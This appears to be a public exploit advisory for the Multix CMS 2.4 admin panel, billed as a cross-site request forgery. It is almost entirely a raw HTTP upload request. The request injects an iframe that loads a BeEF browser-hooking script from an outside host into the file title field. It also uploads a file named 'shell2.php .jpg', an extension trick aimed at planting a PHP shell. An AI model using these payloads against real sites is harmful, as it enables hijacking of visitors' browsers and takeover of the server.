Multix version 2.4 suffers from a cross site request forgery vulnerability.
d804687ad3c71ed52a7465168db79fb1a6b87b78c6e128b3cc988a897cc33cf8
# Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Cross Site Request Forgery
# Exploit Author: th3d1gger
# Vendor Homepage: https://codecanyon.net
# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596
# Version: Version 2.4
# Tested on Ubuntu 18.04
-------Request-----------
POST /admin/file/add HTTP/1.1
Host: localhost
Content-Length: 466
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5Ve
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Referer: http://localhost/admin/file/add
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: allow=1;
Connection: close
------WebKitFormBoundaryE0mBtYGic6umB5Ve
Content-Disposition: form-data; name="file_title"
<iframe src="http://local.proxy:3000/?url=http://localhost/beefhook.html"></iframe>
------WebKitFormBoundaryE0mBtYGic6umB5Ve
Content-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"
Content-Type: image
asdasd
------WebKitFormBoundaryE0mBtYGic6umB5Ve
Content-Disposition: form-data; name="form1"
------WebKitFormBoundaryE0mBtYGic6umB5Ve--